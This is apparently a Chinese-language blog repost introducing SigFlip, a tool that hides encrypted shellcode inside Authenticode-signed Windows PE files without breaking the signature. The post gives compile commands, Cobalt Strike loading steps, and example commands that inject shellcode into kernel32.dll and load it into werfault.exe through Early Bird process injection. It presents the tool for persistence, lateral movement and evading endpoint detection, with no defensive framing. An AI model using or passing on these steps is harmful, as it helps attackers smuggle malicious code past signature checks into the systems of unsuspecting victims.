SigFlip如何篡改身份認證碼簽名的PE檔案
| 導讀 | SigFlip是一款能夠篡改經過身份認證碼簽名的PE檔案(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。 |
SigFlip是一款能夠篡改經過身份認證碼簽名的PE檔案(exe、dll、sys等)的工具,而且整個過程不會影響或破壞已有的身份認證碼簽名。換句話來說,就是我們可以使用SigFlip向PE檔案中嵌入資料(比如 code),並且再不會破壞檔案簽名、完整性檢查或PE檔案功能的情況下,修改PE檔案的校驗和或雜湊。
SigInject元件可以將Shellcode注入至PE檔案的[WIN_CERTIFICATE]證照表中,並輸出加密金鑰以便配合BOF/C/C#載入器(SigLoader)一起使用。SigInject將儲存針對PE檔案的修改操作,並保證其簽名和證照有效性不變。
SigLoader是一個基礎載入器,它採用SigInject建立的修改後的PE檔案路徑和解密金鑰作為引數,然後提取和解密嵌入的Shellcode,以供選擇Shellcode注入使用。
SigFlip將檢查PE雜湊是否已成功更改,然後退出以繞過終端針對此類行為的檢查。
SigFlip可以用於持久化感染、橫向滲透以及 /程式碼執行等場景。
注意事項:igFlip、SigInject和SigLoader將以BOF 和.NET程式集提供。
廣大研究人員可以使用下列 將該專案原始碼克隆至本地:
git clone
本專案並沒有提供預編譯的BOF,我們可以使用Mingw-w64來進行編譯。如果是.NET,可以使用VS或csc.exe來編譯.NET專案(SigFlip、SigLoader);如果是BOF,請按照下列步驟操作:
➜ i686-w64-mingw32-gcc -c sigflip.c -o sigflip.x86.o ➜ x86_64-w64-mingw32-gcc -c sigflip.c -o sigflip.x64.o ➜ x86_64-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x64.o ➜ i686-w64-mingw32-gcc -c SigLoader/sigloader.c -o sigloader.x86.o
確保所有的物件檔案都儲存在sigflip.cna的相同目錄下,然後在Cobalt Strike中載入sigflip.cna。
注意事項:預編譯的BOF使用的是mingw-64 v8.0.0_3,如果你所使用的mingw-64 >= v9,可能會出現崩潰的情況。
執行程式集:
execute-assembly SigFlip.exe -h execute-assembly SigLoader -h
BOF:
當我們在Cobalt Strike中載入sigflip.cna了之後,將會註冊兩個新命令,我們此時就能夠以下列方式使用SigFlip和SigInject了。
- SigFlip:在不破壞簽名或證照有效性的情況下,修改PE檔案雜湊:
SigFlip "" ""
- SigInject:向PE檔案的[WIN_CERTIFICATE]證照表中注入加密的Shellcode,列印的加密金鑰可以跟基礎C/C#載入器結合使用以保證簽名和證照的完整性:
SigInject "" ""
- SigLoader:從PE檔案中載入由SigInject加密的Shellcode,然後使用Early Bird向指定程式注入Shellcode,我們可以自定義Shellcode的注入邏輯,或直接替換目的碼:
SigLoader
(1) BOF
向msbuild.exe注入隨機資料:
SigFlip "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe" "C:\lolbins\modified-msbuild.exe"
向kernel32.ell注入Shellcode:
SigInject "C:\Windows\System32\kernel32.dll" "C:\random\modified-kernel32.dll" "C:\shellcode\cobaltstrike_or_msf_shellcode.bin" Sigloader "C:\random\modified-kernel32.dll" "DECRYPTION_KEY" "C:\Windows\System32\werfault.exe" 6300
(2) 執行程式集
向msbuild.exe注入隨機資料:
execute-assembly SigFlip.exe -b C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe -o C:\Temp\MSBuild.exe
向kernel32.ell注入Shellcode:
execute-assembly SigFlip.exe -i C:\Windows\System32\kernel32.dll -s C:\Temp\x86shellcode.bin -o C:\Temp\kernel32.dll -e TestSecretKey execute-assembly SigLoader.exe -f C:\Temp\modified-kernel32.dll -e TestSecretKey -pid 2354
原文來自:
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/69955379/viewspace-2795890/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 增強版實名認證介面-Java身份證實名認證介面程式碼-身份認證Java
- 申請程式碼簽名證書如何生成CSR檔案
- 如何進行UEFI簽名認證
- C++身份核驗介面程式碼、身份證OCR、身份證實名認證APIC++API
- WHQL 認證需要購買EV 程式碼簽名證書
- 證書的數字簽名和認證 (轉)
- REST API簽名認證機制RESTAPI
- 重新整理 .net core 實踐篇————閘道器中的身份簽名認證[三十七]
- 程式碼簽名證書
- WHQL認證如何給驅動程式做數字簽名
- 程式碼簽名證書是如何進行驗證工作的
- thawte程式碼簽名證書和Comodo程式碼簽名證書區別
- EV程式碼簽名證書和標準程式碼簽名證書有何不同?
- 怎麼使用iOS證書來申請簽名檔案iOS
- 公鑰加密、數字簽名、訊息認證加密
- 身份證真偽查詢介面、身份證實名認證一行python程式碼即可實現,實時資料Python
- 免費實名認證介面python語言-身份核驗-身份證二、三要素Python
- 普通OV版程式碼簽名證書,與EV程式碼簽名證書的作用以及區別
- Kerberos身份認證方案ROS
- 公司只提供簽名服務,不提供證書檔案,如何打包Electron應用
- 1.6.5. 使用密碼檔案認證密碼
- 在 MeterSphere 中使用預執行指令碼功能生成介面認證簽名指令碼
- 網路身份認證——Kerberos配置及認證ROS
- 作業系統認證與ORACLE密碼檔案認證方式作業系統Oracle密碼
- JWT身份認證(附帶原始碼講解)JWT原始碼
- 如何驗證 Bitcoin Core 軟體簽名
- DigiCert EV 程式碼簽名證書
- 程式碼簽名證書能給哪些應用程式進行簽名
- 為什麼驅動程式簽名需要EV程式碼簽名證書
- 身份認證的盡頭竟然是無密碼 ?密碼
- node.js -- 身份認證Node.js
- 無密碼身份認證,跟密碼說再見!密碼
- 程式碼簽名證書與SSL證書區別
- Laravel 5 API 服務端支援簽名授權認證LaravelAPI服務端
- Android | 教你如何在安卓上實現二代身份證識別,一鍵實名認證Android安卓
- 作業系統身份驗證和口令檔案身份驗證總結作業系統
- 關於os認證和口令檔案認證
- PE檔案格式